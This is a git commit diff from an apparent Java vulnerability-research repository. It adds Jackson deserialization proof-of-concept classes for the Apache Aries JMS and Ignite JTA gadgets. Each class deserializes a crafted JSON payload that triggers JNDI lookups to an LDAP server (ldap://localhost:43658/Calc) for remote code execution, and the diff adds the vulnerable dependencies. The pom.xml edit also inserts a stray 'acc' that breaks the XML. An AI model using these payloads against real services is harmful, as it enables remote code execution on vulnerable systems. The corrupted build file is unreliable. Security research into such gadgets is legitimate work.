feat:添加ignite-jta和aries.transaction.jms新jackson gadget

Author: “threedr3am”

jackson/pom.xml

@@ -97,7 +97,7 @@
     </dependency>
 
     <!-- https://mvnrepository.com/artifact/com.codahale.metrics/metrics-healthchecks -->
-    <dependency>
+    <dependency>acc
       <groupId>com.codahale.metrics</groupId>
       <artifactId>metrics-healthchecks</artifactId>
       <version>3.0.2</version>
@@ -126,6 +126,19 @@
       <artifactId>shiro-core</artifactId>
       <version>1.5.1</version>
     </dependency>
+
+      <dependency>
+      <groupId>org.apache.ignite</groupId>
+      <artifactId>ignite-jta</artifactId>
+      <version>2.8.0</version>
+    </dependency>
+
+    <dependency>
+      <groupId>org.apache.aries.transaction</groupId>
+      <artifactId>org.apache.aries.transaction.jms</artifactId>
+      <version>2.0.0</version>
+    </dependency>
+
   </dependencies>
 
 </project>

jackson/src/main/java/com/threedr3am/bug/jackson/rce/AriesJMSPoc.java

@@ -0,0 +1,47 @@
+package com.threedr3am.bug.jackson.rce;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.threedr3am.bug.common.server.LdapServer;
+import java.io.IOException;
+
+/**
+ * 比较鸡肋，需要调用writeValueAsString才能触发
+ *
+ * Reporter: Srikanth Ramu
+ *
+ * Fix will be included in:
+ *
+ * 2.9.10.4
+ * Does not affect 2.10.0 and later
+ *
+ * aries.transaction.jms gadget
+ *
+ * <dependency>
+ *     <groupId>org.apache.aries.transaction</groupId>
+ *     <artifactId>org.apache.aries.transaction.jms</artifactId>
+ *     <version>2.0.0</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class AriesJMSPoc {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws IOException {
+    ObjectMapper mapper = new ObjectMapper();
+    mapper.enableDefaultTyping();
+
+    String json = "[\"org.apache.aries.transaction.jms.RecoverablePooledConnectionFactory\", {\"tmJndiName\": \"ldap://localhost:43658/Calc\", \"tmFromJndi\": true}]";
+    Object o = mapper.readValue(json, Object.class);
+    mapper.writeValueAsString(o);
+  }
+
+
+}

jackson/src/main/java/com/threedr3am/bug/jackson/rce/IgniteJtaPoc.java

@@ -0,0 +1,48 @@
+package com.threedr3am.bug.jackson.rce;
+
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.threedr3am.bug.common.server.LdapServer;
+import java.io.IOException;
+
+/**
+ *
+ * 比较鸡肋，需要调用writeValueAsString才能触发
+ *
+ * ignite jta gadget
+ *
+ * Mitre id:
+ * Reporters:
+ *
+ * Fix will be included in:
+ *
+ * 2.9.10.4
+ * Does not affect 2.10.0 and later
+ *
+ * <dependency>
+ *       <groupId>org.apache.ignite</groupId>
+ *       <artifactId>ignite-jta</artifactId>
+ *       <version>2.8.0</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class IgniteJtaPoc {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws IOException {
+    ObjectMapper mapper = new ObjectMapper();
+    mapper.enableDefaultTyping();
+
+    String json = "[\"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\", {\"jndiNames\": [\"java.util.ArrayList\", [\"ldap://localhost:43658/Calc\"]]}]";
+    Object o = mapper.readValue(json, Object.class);
+    mapper.writeValueAsString(o);
+  }
+
+}

jackson/src/main/java/com/threedr3am/bug/jackson/rce/ShiroPoc.java

@@ -32,7 +32,6 @@ public static void main(String[] args) throws IOException {
     mapper.enableDefaultTyping();
 
     String json = "[\"org.apache.shiro.realm.jndi.JndiRealmFactory\", {\"jndiNames\": \"ldap://localhost:43658/Calc\"}]";
-    System.out.println(json.charAt(65));
     Object o = mapper.readValue(json, Object.class);
     mapper.writeValueAsString(o);
   }